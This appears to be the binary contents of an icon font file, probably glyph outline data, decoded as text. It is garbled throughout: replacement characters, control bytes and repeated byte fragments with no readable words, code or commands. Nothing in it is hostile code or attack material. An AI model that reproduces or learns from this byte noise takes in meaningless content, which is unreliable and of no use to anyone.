�@gIIggIIgXL4d|���`�"=DQ%533##5#5932654&''!"3!'!"&5463!;.#"9#"&=1"&54632� `` `G)Ig5+���&%H��

@%�Ig
	-�v
p<TT<<TT�`` `` �#gI3Ts�&� & 
�
�%��gI(�
���T<<TT<<T���`�(.;%533##5#5!"&5463!;.#"9;2654&#"3� `` `?��%&@&�)+L8!?
�PIggIIggI�`` `` �&�&�%��!8L+9`�
�@gIIggIIg���`�18EI%932654&''!"3!'!"&5463!;.#"9#"&=1"&54632'35(G)Ig5+���&%H��

@%�Ig
	-�v
p<TT<<TT�� #gI3Ts�&� & 
�
�%��gI(�
���T<<TT<<T�  ���`�"/3%!"&5463!;.#"9;1"&54632'35��%&@&�)+L8!?
�PIggIIgg�� &�&�%��!8L+9`�
�@gIIggIIg�  ���`�	*EL%#"&'7.54632932654&''!"3!'!"&5463!;.#"9#"&=!T<.��T<.�G)Ig5+���&%H��

@%�Ig
	-�v
�-<T��-<T�#gI3Ts�&� & 
�
�%��gI(�
����`�
28%#"&'7'.#"7!"&5463!;.#"9;9gI 8�:!Ig����%&@&�)+L8!?
��8 Ig�gI!:��&�&�%��!8L+9`�
���`�18EOS%932654&''!"3!'!"&5463!;.#"9#"&=1"&54632'3#35#5'35(G)Ig5+���&%H��

@%�Ig
	-�v
p<TT<<TTl  `    #gI3Ts�&� & 
�
�%��gI(�
���T<<TT<<T�    @@  ���`�"/9=%!"&5463!;.#"9;1"&54632'3#35#5'35��%&@&�)+L8!?
�PIggIIggy  `    &�&�%��!8L+9`�
�@gIIggIIg�    @@  @@*7DHR%1.546325!3!"&5463!!2#"&'1!54&#!'!"2654&#"3'353#35#5�	
gI��
��x&&`@�&+5gI)G�X`
�l?��
0<TT<<TT< @  ` �(Ig���
 %@%�%�T3Ig#�@
�
�� T<<TT<<T�  @    @@@ -7;%!"&5463!!2.#"9!51"&54632'3#35#5'35���&&`@�&)+L8!�_�PIggIIggy  `   �%@%�%�!8L+9�  �gIIggIIg�    @@  �@`")-159=AEIM3#!"&5463!!"3!265#"&=;'!5%3#7353#7353!53#7353!5p�%� %&P��

�
�% 
v���```  @``  `�```  ``�%&�& 
� 

 %��
���   `@  �`@    �`@    �@` $(,048<;#!"&5463!3;!5%353535353!535353!5`&�%� %&@ 
����``@ @`@ `�``@ ``�%��%&�&�
�   ``   �``     �``     �@`-@GT%#"&5463253#'##3#'/33#!"&5463!!"3!265#"&=;'2654&#"3�
!//!
  �\" ` ` """D��%� %&P��

�
�% 
v��/!!/�``�` ```�%&�& 
� 

 %��
��p�@`06C%#"&5463253#'##3#'/3!"3!265#"&=3;2654&#"3�
!//!
  �\" ` ` """D���&%�%�& 
���/!!/�``�` ```&� &% %��
� ����#3'!3;26=+"&=#!5%5!!�ٌ�F��%�% /!�!/��������@%&@ 0!//!0���������;26=3'!3!!!�%�%ٌ�F������@&%@�����` �@#.<3'!3;26=+"&=#!5!!;26=!!+"&=#!5�ٌ�F��%�% /!�!/�� ����%�%��@/!�!/��@��@%&@ 0!//!0���� ��� %& 0!//!0��` �@#!!!!+"&=#7!#+"&=��� �� �%�%ٌ���%�%@�� �0!//!0 ��@%&@`@�@$147>35#"&=!"3;26=+"&=#!5%57463!!5!3';'���%��
�%�% /!�!/��`&`�`��`9�99�
v�`�%�
�`@%&@ 0!//!0���&�f��� [[[U�
�`@�@#&)0+"&=#463!;#5'5'!"!#7#5#"&=�%�%�
@%��`���&` �@99�9��v
`@&%@�
�%�00�f�&����� [[[U�
�
`@�@
!-4?CGK3!53;265%!'5'!"7#75!463!;#"&=!+"&='!53535��� �/!�!/�� `���&``99`9��
@%���v
� �@��`���@��0!//!@�� �f�&���[[[[�
�%���
��000�    �  	`@�@%)-1<5'5'!"!#7#5463!;#"&=!535355!+"&5�`���&` �@99�9��
@%���v
����`��� %�%00�f�&����� [[[[�
�%���
���    �  ��  %%``� !/'7'#3#+"&=#735#!#3!53;265�h��h @���%�%ٌ��� ����� �/!�!/�h��h`��@&%@� ���  ���0!//!``� !'7'#3'#53!3#3;26=�h��h �ٌ��������%�%�h��h`�`� ���  �@%%@``�`!/'7'#73#+"&=#735#!#3!53;265�h��h @���%�%ٌ��� ����� �/!�!/ h��h����@&%@� ���  ���0!//!``�`!'7'#3'#53!3#3;26=�h��h �ٌ��������%�% h��h��@� ���  �@%%@ `� $!2#!"&5463!'!"3!2654&#!�&%��&&`,?��

 

�l�%�@%%@%��
��

�
 `� '!"3!2654&#!@��&& %&����%��%%�% `� )5463!!2!#!"&5%'!"3!2654&#!@
M?�
��`
��
�@��&& %&�� �
�
@ ��

`��%��%%�% `� 5463!!23!265! &`@�&�`& %�` �%�%@ ��%%` `7J5463!!2!#!"&55463!!2#1512654&#!'!"#'!"3!2654&#! 
M?�
��`
��
@&`@�&%

�l?��
 �@��&& %&���
�
@ ��

`@ %�%�@% 
�
�
 ��%��%%�% `,5463!!23!265!5463!!2#14&#!'&`@�&�`& %�``&`@�&%8(��@�%�%@ ��%%`@ %�%�@%�(8� `� 2!#!"&5!'7'%5463!!2%'!"3!2654&#!�
��
�h��h�@
M?�
�`@��&& %&����

`��h��h" �
�
@��%��%%�% `� !#!"&5!'7'%5463!!2�%��&�h��h� &`@�&��%%`��h��h" �%�%@ `� 1%!"&5!#!7'7%5463!!2%'!"3!2654&#!�
`
��h��h�`
M?�
�`@��&& %&���
`��
 h��h��
�
@��%��%%�% `� %!"&5!#!7'75463!!2�&�%��h��h�@&`@�&`%`��% h��h����%�%@@@=IZ%!"&5!"&#""754&#!'!"3!;26=4&+54632354&'9%5463!!232+"&=463�`
`.B
�&��@��&&�
�

�/!!/ $��
M?�
p�
	�
	�
`AA/P
ի%�%��% 

�
P!//!"6
k�
�
@��	�		�	@@A5463!!23!5467546325!32+"&=46354632#54&#"3&`@�&�`%�T<
�`� 

�

B..B /!!/�@�%�%@ ��%�9<T(�
�

�
P/AB.!//!P@@3<IZ%546315463235!3!"&5463!!212+"&=7354&#"%!54&#!'!"";26=4&+�
B.��
��`&&`@�&$

�
@�/!!/�`
�l?��
�	
�	
��`
0.Ba��
 %@%�%�
7!0
�

 �0!//!�@
�
���	�		�	@@6?5463!!23!5467546325!";26=4&#54&#"34632#&`@�&�`%�T<
�`

�

B..B /!!/�@�%�%@ ��%�9<T(�P
�

�
P.BB.!//!P `� #6C#"&54632!2#!"&5463!'!"3!2654&#!2654&#"3
-<TT<<T���&%��&&`,?��

 

�l<.BB..BB.?T<<TT<.�%�@%%@%��
��

�
��B..BB..B `� $1#"&54632'!"3!2654&#!2654&#"3
-<TT<<T��@��&& %&��P.BB..BB.?T<<TT<.��%��%%�%��B..BB..B  (+/3%!3!"&5463!!2!7!54&#!'!"!'3535��P��
F��&&`@�&`�`&��`
�l?��
�0�   ����
 %@%�%�b�@�@
�
���``�    %!"&5!'%5463!!2!73535`��&�p��&`@�&p�`�   `%`��`�%�%@����``�    6CP%'7'77'1.546325!3!"&5463!!2#"&'1!54&#!'!"2654&#"3PDDDDDDD�	
gI��
��x&&`@�&+5gI)G�X`
�l?��
0<TT<<TT<�DDDDDDD(Ig���
 %@%�%�T3Ig#�@
�
�� T<<TT<<T  +7%!"&5!.#"15463!!22654&#"7'7'77���&�)+L8!�_&`@�&PIggIIggIDDDDDDD`%`p!8L+9��%�%@�gIIggIIg�DDDDDDD  *7DK%1.546325!3!"&5463!!2#"&'1!54&#!'!"2654&#"3/77�	
gI��
��x&&`@�&+5gI)G�X`
�l?��
0<TT<<TT<K4d{�(Ig���
 %@%�%�T3Ig#�@
�
�� T<<TT<<T8L4d|  ,3%!"&5!.#"15463!!22654&#"3/77���&�)+L8!�_&`@�&PIggIIggIK4d{`%`p!8L+9��%�%@�gIIggIIgXL4d|  6CP%533##5#51.546325!3!"&5463!!2#"&'1!54&#!'!"2654&#"3@ `` `-	
gI��
��x&&`@�&+5gI)G�X`
�l?��
0<TT<<TT<�`` `` `(Ig���
 %@%�%�T3Ig#�@
�
�� T<<TT<<T  +8%#53533###!"&5!.#"15463!!22654&#"3@`` `` ���&�)+L8!�_&`@�&PIggIIggI� `` `%`p!8L+9��%�%@�gIIggIIg  *7DH%1.546325!3!"&5463!!2#"&'1!54&#!'!"2654&#"3'35�	
gI��
��x&&`@�&+5gI)G�X`
�l?��
0<TT<<TT<p�(Ig���
 %@%�%�T3Ig#�@
�
�� T<<TT<<T�    ,0%!"&5!.#"15463!!21"&54632'35���&�)+L8!�_&`@�&PIggIIgg��`%`p!8L+9��%�%@�gIIggIIg�    	$>K32654&'.#"'1.546325!3!"&5463!!2#"&'1!54&#!'!"��-<T%-<T,	
gI��
��x&&`@�&+5gI)G�X`
�l?��
*�T<.*T<.
(Ig���
 %@%�%�T3Ig#�@
�
�  
)5#"&'7'.#"7!"&5!.#"15463!!2�gI 8�:!Ig����&�)+L8!�_&`@�&?8 Ig�gI!:��%`p!8L+9��%�%@@`� -33#!"&5!75463!!2%'!"3!2654&#!3'5�
��
�``�`
M?�
�`@��&& %&��@�@@��

`��``@�
�
@��%��%%�%��@@�@`� !3#!"&5!7%5463!!275#�%��&``�@&`@�&��@@���%%`��``  �%�%@ �@@��@`Udkx5#535#535#535#535#535#535#5#"3!265#"&=#3#3#3#3#3#3##"&54679#!"&5463!';'"32654&#�             `

�
�%�            $/!!/%�%� %&`��
v��~"             
� 

 %�            B,!//!,��%&�&ఐ
��0�@`Y_l5#535#535#535#535#535#535#535#"3!265#"&=##3#3#3#3#3#3##"&54679;"32654&#�              �&%�%�&�             $/!!/%�
��p~"              &� &% %�             B,!//!,�
���@`Rcp32654&'535#535#535#535#535#535#532#!"&546;3#3#3#3#3#3#3"3!2654&#!12#"&546%/!!/$            �(88(��(88(�             �5KK5`5KK5����,!//!,B            8(��(88(`(8             �K5��5KK5`5K��@`Wd5#535#535#535#535#535#535#535#"3!2654&+#3#3#3#3#3#3##"&54679"32654&#              �5KK5`5KK5�             $/!!/%~"              K5��5KK5`5K             B,!//!,�pP 1#".54>32"'%2>54.#"3n"P,8cJ++Jc88cJ++%���2WA&&AW22WA&&AW22+Jc88cJ++Jc88c%��&AW22WA&&AW22WA&��` 3#".54>321"/'2>54.#"3n"P,8cJ++Jc88cJ+�

&
��+L8!!8L++L8!!8L+2+Jc88cJ++Jc8,P"�%


�!8L++L8!!8L++L8!�pp +@533##5#5#".54>327"/72>54.#"3� �� �E$]48cJ++Jc88cJ+% ���2WA&&AW22WA&&AW2 �� �� � %+Jc88cJ++Jc84]$��%&AW22WA&&AW22WA&��` *?533##5#5#".54>321"/'2>54.#"3� �� �."P,8cJ++Jc88cJ+�

&
��+L8!!8L++L8!!8L+ �� �� �+Jc88cJ++Jc8,P"�%


�!8L++L8!!8L++L8!�pp 48#".54>327"/72>54.#"3!5�$]48cJ++Jc88cJ+% ���2WA&&AW22WA&&AW2� E %+Jc88cJ++Jc84]$��%&AW22WA&&AW22WA&  ��` 37#".54>321"/'2>54.#"3'!5n"P,8cJ++Jc88cJ+�

&
��+L8!!8L++L8!!8L+� 2+Jc88cJ++Jc8,P"�%


�!8L++L8!!8L++L8!�  �@`+I_hy9.54632#"&5'326=>54&#"154>322#!"&54639;54632354.#"!54&#""3!2654&#!�	
 /!!/�&AW22WA&(88(� (88(  gIIg !8L++L8!@ T<<T`%%�%%� S		@@@!!//!!p2WA&&AW2p8(��(88(@(8pIggIpp+L8!!8L+pp<TT<�&��&&@&�@`2;1.54632#"&59"3!2654&#54.#"354632�	
�(88(�(88(&AW22WA&`T<<TS		P8(��(88(@(8p2WA&&AW2pp<TT<p ����+Vr�%9.54632#"&5'326=>54&#"1!2#!"&546354&#"#"&=4>32'4.#"3126=46323"3!2654&#!�	
 /!!/`�(88(� (88(T<<T&AW22WA& !8L++L8!
	gIIg @%%�%%� �S		@@@!!//!!8(��(88(@(8�<TT<��2WA&&AW2��+L8!!8L+�		�IggI� &��&&@& ����@%326=>54&#"14&#"#"&=4>32!2#!"&54635�
	�T<<T&AW22WA&�(88(� (88(�S		S�<TT<��2WA&&AW2�8(��(88(@(8����`�.Ndz�#"&=4&#"!2#!"&546354>32'4.#"3546323126=9.54632#"&5'326=>54&#"1'"3!2654&#!T<<T(88(� (88(&AW22WA& !8L++L8!gIIg
	�	
 /!!/�%%�%%� �`�<TT<�8(��(88(@(8�2WA&&AW2  +L8!!8L+��IggI�		��S		@@@!!//!!�&��&&@&���`�D%9.54632#"&554.#""3!2654&#!&4=4632326=	
&AW22WA&(88(�(88(��T<<T�S		  2WA&&AW2�8(��(88(@(8�<TT<t##T�``
9=AEIMcl7!54&#!"373!265!%5#54>322#!"&5463937#37#37#37#37#354632354.#"!54&#"�`%� %0H%�%��`0�(&AW22WA&(88(� (88(@0@0@0@0@0@0@0@0@0@�x gIIg !8L++L8!@ T<<T�&&� @@`%% @@�p2WA&&AW2p8(��(88(@(8��@@@@@@@@@@pIggIpp+L8!!8L+pp<TT<
�`` $9B%5##!"&5!%53373373373373373754&#54.#""54632`80h8(� (8��`h0 0@0 0@0 0@0 0@0 0@0�8(&AW22WA&(8�T<<T�@@ (88( @@@@@@@@@@@@`�(8p2WA&&AW2p8(� p<TT<p�``*Lbk�1.54632#"&5'326=>54&#"154>322+".=4639;54632354.#"!54&#"";2>=4&#!	
 /!!/�&AW22WA&(8(F]5�5]F(8(  gIIg !8L++L8!@ T<<T`%#=R.�/Q=#%� S		@@@!!//!!p2WA&&AW2p8(�5]F((F]5�(8pIggIpp+L8!!8L+pp<TT<�&�.R=##=R.�&�``6?1.54632#"&59";2>=4&#54.#"354632	
�(8(F]5�5]F(8(&AW22WA&`T<<TS		P8(�5]F((F]5�(8p2WA&&AW2pp<TT<p@���+Zv�%9.54632#"&5'326=>54&#"1!2+".=46354&#"#"&=4>32'4.#"3126=46323";2>=4&#!�	
 /!!/`�(8(F]5�5]F(8(T<<T&AW22WA& !8L++L8!
	gIIg @%#=R.�/Q=#%� �S		@@@!!//!!8(�5]F((F]5�(8�<TT<��2WA&&AW2��+L8!!8L+�		�IggI� &�.R=##=R.�&@���D%326=>54&#"14&#"#"&=4>32!2+".=4635�
	�T<<T&AW22WA&�(8(F]5�5]F(8(�S		S�<TT<��2WA&&AW2�8(�5]F((F]5�(8����`�2Rh~�#"&=4&#"!2+".=46354>32'4.#"3546323126=9.54632#"&5'326=>54&#"1'";2>=4&#!T<<T(8(F]5�5]F(8(&AW22WA& !8L++L8!gIIg
	�	
 /!!/�%#=R.�/Q=#%� �`�<TT<�8(�5]F((F]5�(8�2WA&&AW2  +L8!!8L+��IggI�		��S		@@@!!//!!�&�.R=##=R.�&���`�H%9.54632#"&554.#"";2>=4&#!&4=4632326=	
&AW22WA&(8(F]5�5]F(8(��T<<T�S		  2WA&&AW2�8(�5]F((F]5�(8�<TT<t##T�``<R[%5!5!5!5!5!5!4&#!"3!265!5!54>322#!"&54639;54632354.#"!54&#"@�� �� �� %� %%�%�� ��&AW22WA&(88(� (88(  gIIg !8L++L8!@ T<<T�@ @ @ %&��&% �p2WA&&AW2p8(��(88(@(8pIggIpp+L8!!8L+pp<TT<�``)2%!5!5!5!5!5!5!5!4&#54.#""3!26554632`��@��@��@��@8(&AW22WA&(88(�(8� T<<T` @ @ @ (8p2WA&&AW2p8(��(88(�p<TT<p �`#8CN[%#!"&=#"&546;5463!232#%5!32654&#!";"!54&#!3!26=!%2654&#"3 %� %@(88(@%�%@(88(�``@&&� &&@@
 
�  
�
�� 



` %% 8( (8�%%�8(��(8 ��% &%��&�
��
���

�



 �`
)65463!2!#"&5463!2+!3!265!%2654&#"3�%�%��  (88(�(88( �` %�%��@



`�%%��8( (88(��(8 �%%`



 ����#8CN[%32654&+54&#!"#";3!265%#"&5463!2+5!!2!5463!#!"&=%2654&#"3 @(88(@%� %@(88(@%�%��@&&�&&@��@�
��
  
� 
 



�8( (8�%%�8(��(8�%%�& %&��%``�
��
���

�



 ����
)65463!2!#"&5463!2+5!3!265!%2654&#"3�%�%��  (88(�(88( �` %�%��@



��%%��8( (88(��(8� �%%�



@�`#8CN[_c%#!"&=#"&546;5463!232#%5!32654&#!";"!54&#!3!26=!%2654&#"3!5!5@%� %@(88(@%�%@(88(�``@&&� &&@@
 
�  
�
�� 



�� �` %% 8( (8�%%�8(��(8 ��% &%��&�
��
���

�



�  `  @�`
)6:>5463!2!#"&5463!2+!!#!"&5%2654&#"3!5!5�%�%��  (88(�(88( �` `%� %@



�� �`�%%��8( (88(��(8 �%%`



�  `   ����#8CN[_c%32654&+54&#!"#";3!265%#"&5463!2+5!!2!5463!#!"&=%2654&#"3!5!5 @(88(@%� %@(88(@%�%��@&&�&&@��@�
��
  
� 
 



�� �8( (8�%%�8(��(8�%%�& %&��%``�
��
���

�



�  `   ����
)6:>5463!2!#"&5463!2+5!!#!"&5%2654&#"3!5!5�%�%��  (88(�(88( �` `%� %@



�� ���%%��8( (88(��(8� �%%�



�  `  
��`&*.26:>BFJN!#53!53#'#5#"&=!"#463!';'3#3#35#3#3#3#35#3#3#3`�`  �    �%��
 &`��
v�� ` ` ` ` ` ` ` ` ` @@�@@���%�
�`�&ఐ
���� ���� ��� ��� ��� 
��`!%)-159=AE!#53!53#%463!;;3#3#35#3#3#3#35#3#3#3`�`  �  ��&@&��
�  ` ` ` ` ` ` ` ` ` @@�@@���&�%��
���� ���� ��� ��� ���   �`1<IMQUY]aeimq%326=4&+54&#!"#";5!%"&=463!2#5!!2!54632654&#"33335333353353353333533#35@ (88(@%� %@(88( ��@%&�&%� ��
��




��             `   � �8(�(8�%%�8(�(8`` %�%%�&``@
��
�`



�������������
  �`
+/37;?CGKOS5463!2!#"&=463!2+5!%2654&#"33335333353353353333533#35�%�%��  (88(�(88( �``



��             `   � `�%%���8(�(88(�(8``



�������������
� ��'+/37CW^%#53326=#+#53#53#53#"&=3;%5#!53%5#!53%53#5!#53%#5#"&=!"#463!';'�@@  % 
 �@@`@@`@@` % 
  �� @ �� `  �`  � �%��
 &`��
v�   %  
       &  
`@@@@`@@@@�@�@@�@ �%�
�`�&ఐ
�
� ��#'+7COU%#5335##5335##"&=3;%5##5%5335%53#5!#53%5#"&=!"+5326=;`@@ @@�@@ @@� % 
    ��   `  �`  ��&��&`%  
�
�         &  
�@@ @@ @@ @@�@�@@�@ �%�&�`�� % 
 �
@�K%'7'##"&54671.54632>321+32654&'1.#".#"1;5�h��h  �5K9*pP?b.9R)7K5��B^8,`@'g?.R=#*6^B�Xh��hh�K5-F
	PpH8M7
E-5K ^B2P<P		3?#=R.O1B^ @�)-%!2654&'1.#".#"13!'7'5'35B^8,`@'g?.R=#*6^Bh��h  �^B2P<P		3?#=R.O1B^�h��h����@`� K'7'#'#"&54671.54632>321+32654&'1.#".#"1;5�h��h  �5K9*pP?b.9R)7K5��B^8,`@'g?.R=#*6^B��h��h���K5-F
	PpH8M7
E-5K ^B2P<P		3?#=R.O1B^ @`� )-!2654&'1.#".#"13!5'7'#35B^8,`@'g?.R=#*6^Bh��h  ^B2P<P		3?#=R.O1B^�h��h���@�� !EHLP#"&54671.54632>321+'32654&'1.#".#"1;!!73535l�5K9*pP?b.9R)7K5���yB^8,`@'g?.R=#*6^By9�И�Ј    K5-F
	PpH8M7
E-5K�� ^B2P<P		3?#=R.O1B^` ��``�  @�� "%)-32654&'1.#".#"1;!73535�QB^8,`@'g?.R=#*6^BQ��`�   ^B2P<P		3?#=R.O1B^@@���``�  @���@3!2654&'1.#".#"1%#!"&54671<54>32>329�*9K5 5K7)R9.b?Ppy,8^B��B^6*#=R.?g'@`�
F-5KK5-E
7M8HpP	P2B^^B1O.R=#?3		P<@���#!"&54671<54>32>32<,8^B��B^6*#=R.?g'@`�P2B^^B1O.R=#?3		P<`���#(-23'!3;26=+"&=#!5%5!!!'!!'!!'!�ٌ�F��%�% /!�!/���������*��L&&����@&%@ 0!//!0������  @  @  `���#;26=3'!3!!!!'!!'!!'!`%�%ٌ�F���������*��L&&��@&%@������  @  @  �``%#3'3#546;274&+"@��99r�
@
@`&@%���JJ@`

���&&�`�``%#'54&+"`��``�&@%�� ��@`&&`��3�	''7627'7>/&"��SijS7		&		7�Pe ��&4�-;��Si<S7

%

7��Oc� �5&�-��3�
764/.?'�7&47��� �jj���;75&8���� �j���`�`+BI	''76271'!"3!2657>/&"#!"&5463!;?#"&=N��SijS7		&		7�PeC���&%�%�&4s 
� 

@%��� ����v
;��Si<S7

%

7��Oct�&� &%@�5&s���

�
�%��� �а
�`�`/5'?64/&"7'%#!"&5463!;762;NS��Si7		&		7S�ePC%� %&@&��4&�
�;S��Si7

%

7S��cOt��%&�&�%�&5��

��� �#/CJNRVZ^k%9>54&#"!"&5463!;+593267'73265'!"3!75#"&=35'35!5!5!51"&54632�B..B�

@%�
@�

00�@%���&%PP@�v
��������`��`�p!//!!//�(.BB.("
�
�%��
"~00S%@�&� &�PP�0�
��  `  �  `  `  ��/!!//!!/	��� �#/59=AEIV%9>54&#"!"&5463!;+575#"&'1;!35'35!5!5!52654&#"3�B..B�%&@&�%@�00

@
��������`��`�p!//!!//!�(.BB.(B&�&�%��%B�00�5�
  `  �  `  `  ��/!!//!!/�`�!-CGKO\!2654&#!";5.54632975#"&'1#"&5463!2#!'5!5!5352654&#"3��

��

@B..B�00

 @&&�&&�`PP @�� ���0!//!!//!BB
�

�`
B(.BB.(~00~K%�%%�`%�PP��  `  `  `/!!//!!/���!-159F9>54&#"#"&5463!2#!575#"&'1!5!5352654&#"3�B..B@&&�&&�`�00

@@�� ���0!//!!//!B(.BB.(b%�%%�`%b�00�5  `  `  `/!!//!!/	�@�@"&*#5!!#!7!'5!!3'353535'35`����`��� ������� ` @`������ ��@��������������  �  @  �@�@#!35!!!3!#3#353535'35�@�@��@�����@��``   `������ �� �����  �  @  `@�@-5!!!'!!32+"&5463";2654&+`���'Ҍ�F��@�%%�%%

�

�0���� �@��%%%% 



`@�@	!!'!";2654&+`������F�%%�%%�@����%%%%`@�@	
+05:!!'!!32+"&5463";2654&+!'!!'!!'!`������F��@�%%�%%

�

�`���*��L&&�@���� �@��%%%% 



�  @  @  `@�@	"'!!'!";2654&+!'!!'!!'!`������F�%%�%%�`���*��L&&�@����%%%%�  @  @  `��-15!!!'!!32+"&5463";2654&+!5`���'Ҍ�F��@�%%�%%

�

����p������@��%%%% 



@```��!5!!!";2654&+��� �ࠠ ���%%�%%�```�� ����%%%%@@� -#!#!!%!532+"&5463";2654&+�@`@�  ��  � �%%�%%

�

� �� �@����%%%% 



@@� !%5!";2654&+`�  ��`%%�%%� � � ��%%%%@ �3!!7!3!7!!3'5�`�`�``���@��  ���@@�@���`` � ��� �@@�@ �!!775!75#`� �``���@@�� ��``  �� �@@�R�)'Nf3"'4672?64'#.'.'92012#"&546581:12654&'041.'9'.35"&7635"&'1X���5�T
�
	�

�[�!//!!/%1
<IG"5;%' �''�T5��"	�[
	�
	�
`/!!//!E4="8� o(4Sb= -XS�(+C3"'46781:12654&'401.'.'9.35"&7635"&'1X���5�T/,	
<IG#6:%' �''��T5��"bQ	5/
5<"8� o)3Sb= -X�Tl@*7	"'463!#"2?64'1"&54632'2654&#"3���5�T%�
�
	�

�[�!//!!//!@�T5��% 
�[
	�
	��/!!//!!/ �Tl@	"'463!2654&#"3���5�T%�@�T5��%�`4�@%4AN9>3!'"'46;#"2?%#"2?64'1"&54632'2654&#"3�	��*5�T%( 
�
	�]0�
�
	�

�[�!//!!//! �T5�	�% 
�[
	� 
�[
	�
	��/!!//!!/ `.�@*"789%"'463!2654&#"3�%�0�@`��5�T%� %��T�0 �T5��%��Tl@&AN[h533##5#57932672?64'!"7'546;"/>54&#"971"&54632'2654&#"31"&54632  `` `(0gI1Pd5��T�%X X
��

�	
lgI8!//!!//!<TT<<TT `` `` �P1Ig0(d�5�%�XY�
�^	
�	
m
Ig�/!!//!!/ � T<<TT<<T�Tl@(5B533##5#55'463!"/>54.#"972654&#"32654&#"3  `` `@%��5L!8L+8pIggIIggI `` `` �@%�T5�L8+L8!��gIIggIIg�Tl@5BO\`932672?64'!"7'546;"/>54&#"971"&54632'2654&#"31"&54632'35�(0gI1Pd5��T�%X X
��

�	
lgI8!//!!//!<TT<<TT���P1Ig0(d�5�%�XY�
�^	
�	
m
Ig�/!!//!!/ � T<<TT<<T�  �Tl@)6:'463!"/>54.#"972654&#"31"&54632'35�@%��5L!8L+8pIggIIgg���@%�T5�L8+L8!��gIIggIIg�  �Tl@5BO\c932672?64'!"7'546;"/>54&#"971"&54632'2654&#"31"&54632/77�(0gI1Pd5��T�%X X
��

�	
lgI8!//!!//!<TT<<TTLK4d{�P1Ig0(d�5�%�XY�
�^	
�	
m
Ig�/!!//!!/ � T<<TT<<T8L4d|�Tl@)6='463!"/>54.#"972654&#"32654&#"3/77�@%��5L!8L+8pIggIIggIK4d{�@%�T5�L8+L8!��gIIggIIgXL4d|�Tl@&AN[h%'7'77'932672?64'!"7'546;"/>54&#"971"&54632'2654&#"31"&546320DDDDDDD�(0gI1Pd5��T�%X X
��

�	
lgI8!//!!//!<TT<<TT�DDDDDDD�P1Ig0(d�5�%�XY�
�^	
�	
m
Ig�/!!//!!/ � T<<TT<<T�Tl@(5B%'7'77'463!"/>54.#"972654&#"32654&#"30DDDDDDD�@%��5L!8L+8pIggIIggI�DDDDDDD@%�T5�L8+L8!��gIIggIIg����4	"'1&47621"'1&47'12764'1&"127'���&j%&&uB��
	

��5v!!!]!��///�/���&&%j&uB��	
		��5u!]!!!��.�///� �@C%1".54>32"'&4?62"'&4?'2?64'&"2?'S�l??l�SS�l??l�0�&j%&&�B�		
	��5�!!!]!�///�/� ?l�SS�l??l�SS�l?n�&&%j&�B�

		��5� ]!!!�/�///�	� �@	&1;DLa1###.'1>731#.'>731#>799.'3>71#3.'2>54.#"3 Cx..8� �8..xC �8..xC Cx..8� *3�3**3�3*��3**3��3**3pS�l??l�SS�l??l�S 4*3�J`��J�3*4� `J�3*44*3�J��h.wCCw.�.wCCw.Cw..wC Cw..wC��?l�SS�l??l�SS�l?�!�@	)3<FQ%#1%.'3&'>71#11311#>71'.'3>713.'17>71#.'1�D82�J��%+�?4c/7�?43�J�D9/7�?43�J�D9��.8�?42�J�D8!R�4/8�/u@K�02�IK�0/8R�443�JL�0/8��R�53�JL�0/8��R�5� �@Pz��%1>77'>77'>735#.'7'.'7'.'>32''#3771#"&''.546777#31''1!9.'7'.'7'.'35#>77'>77'>72>54.#"3

  

1�HH�1

  

1�HH�1-33-


  


 


  


-33-��S�l??l�SS�l??l�S�(

, ,

(-44-(

, ,

(-44-1HH1
$

' '

$

$

' '

$
1HH1�?l�SS�l??l�SS�l?� �@V��%#"&'9>77'>77'>735#.'7'.'7'.'1>321''#317797>54&'''3#77"671%.546777#3''2&'1 6�OO�6


  


6�OO�6


  


)).81



  



��(-81



  



�2992(

, ,

(2992(

, ,

(+4GN�6
$

' '

$
3}FN�6
$

' '

$
� �@'5J1#"&'>54&'1>32.5467!9.5462>54.#"3	18811�HH�118811�HH�1-33--33-��-33--33=S�l??l�SS�l??l�S�6�NN�6-44-6�NN�6-44-1HH11HH11HH11HH��?l�SS�l??l�SS�l?� �@"1>.#"13267.54>71.54679!>54&' 6�OO�6/!!/6�OO�6/!!/18817@@7��18817@@7�2992BKR++RKB2992BKR++RKB6�NN�63�PP�36�NN�63�PP�3� �@)6CP%1".54>32'2>54.#"32654&#"32654&#"3#2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L`� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:��� �@!.;%1".54>322654&#"32654&#"3#2654&#"3S�l??l�SS�l??l�S`� ?l�SS�l??l�SS�l?�� �@.CXer#"&5467.5463211".54>32'2>54.#"352>54.#"352654&#"352654&#"3@/!!//!!/0S�l??l�SS�l??l�SL�d::d�LL�d::d�L+L8!!8L++L8!!8L+�!!//!!!!//!!�p?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�!8L++L8!!8L++L8!`�� �@.CP]#"&5467.5463211".54>32'2>54.#"352654&#"352654&#"3@/!!//!!/0S�l??l�SS�l??l�S+L8!!8L++L8!!8L+�!!//!!!!//!!�p?l�SS�l??l�SS�l?�!8L++L8!!8L++L8!`�� �@&/4:@EMbh.'77'>7'73#"&/%'?''57%>.'7!7''>322>54.#"3#'7r(O�#z1S1qjygH�K"55#3K)p{#�M{iq1S0��*^�'CkkC'�^�\\..FS�l??l�SS�l??l�Sf)z)f�0�R*c7N")?\zV3��KN��O�/O7c*.4Vz\?)~^l=.U�0ff0&U.=JJ�?l�SS�l??l�SS�l?�S��S� �@&/D.'77'>7'73#"&/%'?''572>54.#"3r(O�#z1S1qjygH�K"55#3K)p{#�M{iq1S0�S�l??l�SS�l??l�S�0�R*c7N")?\zV3��KN��O�/O7c*.4Vz\?)~�?l�SS�l??l�SS�l?@���*18IMQ3#5463!2#3#!"&=%#5.546753'>54&'#"3!2654&#!3#%3#`��
 
��
��
� 6JJ6 6JJ6)77) )77)��%& %&���``�``  `

`��`

